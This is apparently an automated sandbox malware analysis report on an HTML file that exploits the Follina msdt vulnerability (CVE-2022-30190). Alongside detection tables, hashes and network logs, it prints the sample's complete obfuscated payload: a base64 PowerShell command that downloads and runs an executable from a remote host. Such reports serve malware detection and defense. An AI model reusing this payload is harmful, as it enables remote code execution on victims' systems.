Windows
Analysis Report
fbGUvJ4AdV.html
Overview
General Information
Detection
Score: | 56 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
- chrome.exe (PID: 5708 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- chrome.exe (PID: 5404 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1948 --field-trial-handle=1740,i,14618335365964935446,5264089186027307751,131072 /prefetch:8 MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- msdt.exe (PID: 6208 cmdline:
"C:\Window s\system32 \msdt.exe" ms-msdt:/ Id%20PcwDi agnOstic%2 0-skIP%20F ORCE%20-pa raM%20%22I t_ReBrOwse foRfILE=#f bK%20IT_La unchMethod =ContextMe nu%20IT_Br owseForFil e=I$(Iex($ (Iex('[SYS tem.teXT.e NCoDiNG]'+ [ChaR]0x3A +[cHaR]58+ 'UTF8.gEtS TRInG([SYS tEm.conVeR T]'+[CHAR] 58+[ChAR]5 8+'fROmbas E64strInG( '+[ChaR]0X 22+'c1RPcC 1QUk9jZXNz IC1GT1JDZS AtTkFtZSAn bXNkdCc7JH NZID0gQWRk LVRZcEUgLW 1FbUJFUmRF RmluaXRpT0 4gJ1tEbGxJ bXBvcnQoIn VSTE1vbi5k TEwiLCBDaG FyU2V0ID0g Q2hhclNldC 5Vbmljb2Rl KV1wdWJsaW Mgc3RhdGlj IGV4dGVybi BJbnRQdHIg VVJMRG93bm xvYWRUb0Zp bGUoSW50UH RyIHUsc3Ry aW5nIEksc3 RyaW5nIGMs dWludCBzUC xJbnRQdHIg Vik7JyAtTm FtZSAibHhQ IiAtTmFtRV NwQWNlIEtJ eCAtUGFzc1 RocnU7ICRz WTo6VVJMRG 93bmxvYWRU b0ZpbGUoMC wiaHR0cHM6 Ly9hLnBvbW YuY2F0L2lw cmlnay5leG UiLCIkZW5W OkFQUERBVE FcQ2JodHIu ZXhlIiwwLD ApO1NUQVJ0 LVNMRWVwKD MpO1J1bkRs bDMyLkVYZS B6aXBmbGRy LmRsbCxSb3 V0ZVRoZUNh bGwgIiRFbn Y6QVBQREFU QVxDYmh0ci 5leGUiO3NU b3AtUFJPQ0 VzcyAtZm9S Q0UgLU5hbW UgJ3NkaWFn bmhvc3Qn'+ [Char]34+' ))'))))Ti/ ../../../. ./../../.. /../../../ .mSi%20%22 MD5: 8BE43BAF1F37DA5AB31A53CA1C07EE0C)
- chrome.exe (PID: 1108 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\fbGUvJ4AdV.html" MD5: 0FEC2748F363150DC54C1CAFFB1A9408)
- cleanup
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
| JoeSecurity_Follina | Yara detected Microsoft Office Exploit Follina / CVE-2022-30190 | Joe Security | |
AV Detection |
---|
Source: | Virustotal: |
Exploits |
---|
Source: | File source: | (3 matches)
Source: | Directory created: |
Source: | IP Address: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | (8 matches)
Source: | HTTP traffic detected: | (2 matches)
Source: | Virustotal: |
Source: | File created: |
Source: | Key opened: |
Source: | Classification label: |
Source: | Process created: | (39 matches)
Source: | File created: |
Source: | Automated click: | (17 matches)
Source: | File opened: |
Source: | Window detected: |
Source: | Directory created: |
Source: | String : | (4 matches)
Source: | Window / User API: |
Source: | Process created: | (3 matches)
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 1 Command and Scripting Interpreter | Path Interception | 1 Process Injection | 2 Masquerading | OS Credential Dumping | 1 Application Window Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 1 Scripting | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Process Injection | LSASS Memory | 1 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 1 Data Encoding | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | 1 Scripting | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Non-Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 4 Application Layer Protocol | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Software Packing | LSA Secrets | Remote System Discovery | SSH | Keylogging | Data Transfer Size Limits | 1 Ingress Tool Transfer | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Source | Detection | Scanner | Label |
---|---|---|---|
| 12% | ReversingLabs | Script.Exploit.Heuristic |
| 12% | Virustotal | |
| 0% | Metadefender | |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
accounts.google.com | 216.58.215.237 | true | false | | high |
www.google.com | 172.217.168.36 | true | false | | high |
clients.l.google.com | 172.217.168.78 | true | false | | high |
clients2.google.com | unknown | unknown | false | | high |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| false | | high |
| false | | high |
IP | Domain | Country | ASN | ASN Name | Malicious |
---|---|---|---|---|---|
216.58.215.237 | accounts.google.com | United States | 15169 | GOOGLEUS | false |
172.217.168.78 | clients.l.google.com | United States | 15169 | GOOGLEUS | false |
172.217.168.36 | www.google.com | United States | 15169 | GOOGLEUS | false |
239.255.255.250 | unknown | Reserved | unknown | unknown | false |
IP |
---|
192.168.2.1 |
192.168.2.4 |
192.168.2.5 |
192.168.2.23 |
127.0.0.1 |
Joe Sandbox Version: | 35.0.0 Citrine |
Analysis ID: | 696621 |
Start date and time: | 2022-09-02 15:27:50 +02:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 7m 56s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | fbGUvJ4AdV.html |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of new started processes analysed: | 25 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal56.expl.winHTML@39/0@4/9 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: | |
- Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, wuapihost.exe
- Excluded IPs from analysis (whitelisted): 172.217.168.35, 142.250.203.110, 74.125.160.202, 216.58.215.234, 172.217.168.67
- Excluded domains from analysis (whitelisted): r5---sn-4g5e6nzs.gvt1.com, client.wns.windows.com, fs.microsoft.com, r2---sn-4g5e6nzz.gvt1.com, eudb.ris.api.iris.microsoft.com, ctldl.windowsupdate.com, clientservices.googleapis.com, r5---sn-4g5ednsz.gvt1.com, r5.sn-4g5lznez.gvt1.com, arc.msn.com, ris.api.iris.microsoft.com, r4---sn-4g5e6nsk.gvt1.com, redirector.gvt1.com, update.googleapis.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, r5---sn-4g5lznez.gvt1.com, optimizationguide-pa.googleapis.com
- Not all processes were analyzed; the report is missing behavior information
- Report size getting too big, too many NtProtectVirtualMemory calls found.
- Report size getting too big, too many NtWriteVirtualMemory calls found.
Match | Associated Sample Name / URL | SHA 256 | Detection | Context |
---|---|---|---|---|
239.255.255.250 | (20 associated samples; names and hashes not shown) | | malicious | |
File type: | |
Entropy (8bit): | 6.049533660136345 |
TrID: | |
File name: | fbGUvJ4AdV.html |
File size: | 19189 |
MD5: | da3469806af3aacbbbd22a763343fff2 |
SHA1: | 6d9fd23a4d32a5963c24d39b5402eeaf2a54f093 |
SHA256: | c3afbf5a136b204e16eb6e1cf00cbb03ee36eff42f519f26f1d1d1e58f0b87e1 |
SHA512: | 7e0cbfb15bf2bc8bbbb1727ba9bcfc472bad56b6887457be564ab84b1d69c6ad81dc827e1d04cc57f3f3e4255494484073dee58a79a390e08fe3888939730a2d |
SSDEEP: | 384:9W4t9eJgaU7XWH7/hjoNso7qSVUajB+IOFFUD6kNTPhFEsAll:neJgaUShENTHVFVwHM1phFEse |
TLSH: | A082C0A9D03658346DD45C134A753D96BD20FA75C4BC9B282E4CF72D532D4E1ED8283A |
File Content Preview: | <!DOctYpE hTmL>....<HtML>....<bodY>....<ScRiPT laNGUAGe="jscripT">....//Nn2wp6S4Yl6LHD8RlkuH2nRrwM4IwiGC2LqC6DJpN8XYHUc8JE1CS322bpIjLLlSzFr2pDpqdRNlULZdgV0m7sAoiC4lFm8MHONeXSmmMbu8RCnbuU8BXfdqJNfW9P9Ywgg9nOxJaWPpgS3g05gaFqEmQGOCbebhz32j6P95K6A0kX8Y1Cv7mnh |
Icon Hash: | 78d0a8cccc88c460 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Sep 2, 2022 15:28:54.772237062 CEST | 51139 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:54.772720098 CEST | 52955 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:54.799750090 CEST | 53 | 52955 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:28:54.801990986 CEST | 53 | 51139 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:28:57.896194935 CEST | 57704 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:28:57.915808916 CEST | 53 | 57704 | 8.8.8.8 | 192.168.2.3 |
Sep 2, 2022 15:29:57.981518030 CEST | 58119 | 53 | 192.168.2.3 | 8.8.8.8 |
Sep 2, 2022 15:29:58.001106977 CEST | 53 | 58119 | 8.8.8.8 | 192.168.2.3 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Sep 2, 2022 15:28:54.772237062 CEST | 192.168.2.3 | 8.8.8.8 | 0x5880 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:28:54.772720098 CEST | 192.168.2.3 | 8.8.8.8 | 0xbec1 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:28:57.896194935 CEST | 192.168.2.3 | 8.8.8.8 | 0x7fb0 | Standard query (0) | | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:29:57.981518030 CEST | 192.168.2.3 | 8.8.8.8 | 0x9f76 | Standard query (0) | | A (IP address) | IN (0x0001) |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Sep 2, 2022 15:28:54.799750090 CEST | 8.8.8.8 | 192.168.2.3 | 0xbec1 | No error (0) | | | 216.58.215.237 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | | clients.l.google.com | | CNAME (Canonical name) | IN (0x0001) |
Sep 2, 2022 15:28:54.801990986 CEST | 8.8.8.8 | 192.168.2.3 | 0x5880 | No error (0) | | | 172.217.168.78 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:28:57.915808916 CEST | 8.8.8.8 | 192.168.2.3 | 0x7fb0 | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001) |
Sep 2, 2022 15:29:58.001106977 CEST | 8.8.8.8 | 192.168.2.3 | 0x9f76 | No error (0) | | | 172.217.168.36 | A (IP address) | IN (0x0001) |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.3 | 49750 | 216.58.215.237 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 3 | IN | |
2022-09-02 13:28:56 UTC | 4 | IN | |
2022-09-02 13:28:56 UTC | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.3 | 49749 | 172.217.168.78 | 443 | C:\Program Files\Google\Chrome\Application\chrome.exe |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
2022-09-02 13:28:56 UTC | 0 | OUT | |
2022-09-02 13:28:56 UTC | 1 | IN | |
2022-09-02 13:28:56 UTC | 2 | IN | |
2022-09-02 13:28:56 UTC | 2 | IN | |
2022-09-02 13:28:56 UTC | 3 | IN |
Target ID: | 0 |
Start time: | 15:28:47 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 2 |
Start time: | 15:28:52 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 3 |
Start time: | 15:28:52 |
Start date: | 02/09/2022 |
Path: | C:\Program Files\Google\Chrome\Application\chrome.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff614650000 |
File size: | 2851656 bytes |
MD5 hash: | 0FEC2748F363150DC54C1CAFFB1A9408 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Target ID: | 16 |
Start time: | 15:29:57 |
Start date: | 02/09/2022 |
Path: | C:\Windows\System32\msdt.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7d5070000 |
File size: | 1560576 bytes |
MD5 hash: | 8BE43BAF1F37DA5AB31A53CA1C07EE0C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: | |
Reputation: | moderate |
Script: |
---|
Code | ||
---|---|---|
0 | location.href = "mS-" + "msDt:" + "/I" + "d" + " " + "Pcw" + "Dia" + "gnOs" + "ti" + "c" + " " + "-sk" + "IP" + " " + "FOR" + "C" + "E" + " " + "-pa" + "raM" + " " + "\"" + "It_ReBrOwsef" + "oR" + "fIL" + "E" + "=" + "#fbK" + " " + "IT_LaunchMethod=ContextMen" + "u" + " " + "IT_" + "B" + "rows" + "eForF" + "ile" + "=" + "I" + "$(" + "Iex($(Iex('[SYStem.teXT.eNCoDiNG]'+[ChaR]0x3A+[cHaR]58+'UTF8.gEtSTRInG([SYStEm.conVeRT]'+[CHAR]58+[ChAR]58+'fROmbasE64strInG('+[ChaR]0X22+'c1RPcC1QUk9jZXNzIC1GT1JDZSAtTkFtZSAnbXNkdCc7JHNZID0gQWRkLVRZcEUgLW1FbUJFUmRFRmluaXRpT04gJ1tEbGxJbXBvcnQoInVSTE1vbi5kTEwiL" + "CBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyIHUsc3RyaW5nIEksc3RyaW5nIGMsdWludCBz" + "UCxJbnRQdHIgVik7JyAtTmFtZSAibHhQIiAtTmFtRVNwQWNlIEtJeCAtUGFzc1RocnU7ICRzWTo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cHM6Ly" + "9hLnBvbWYuY2F0L2lwcmlnay5leGUiLCIkZW5WOkFQUERBVEFcQ2JodHIuZXhlIiwwLDApO1NUQVJ0LVNM" + "RWVwKDMpO1J1bkRsbDMyLkVYZSB6aXBmbGRyLmRsbCxSb3V0ZVRoZUNhbGwgIiRFbnY6QVBQREFUQVxDYmh0ci5leGUiO3NUb3AtUFJPQ0VzcyAtZm9SQ0UgLU5hbWUgJ3NkaWFnbmhvc3Qn'+" + "[Char]34+'))" + "'))))" + "T" + "i" + "/../../../" + "../../../../../../../" + ".mS" + "i" + " " + "\""; |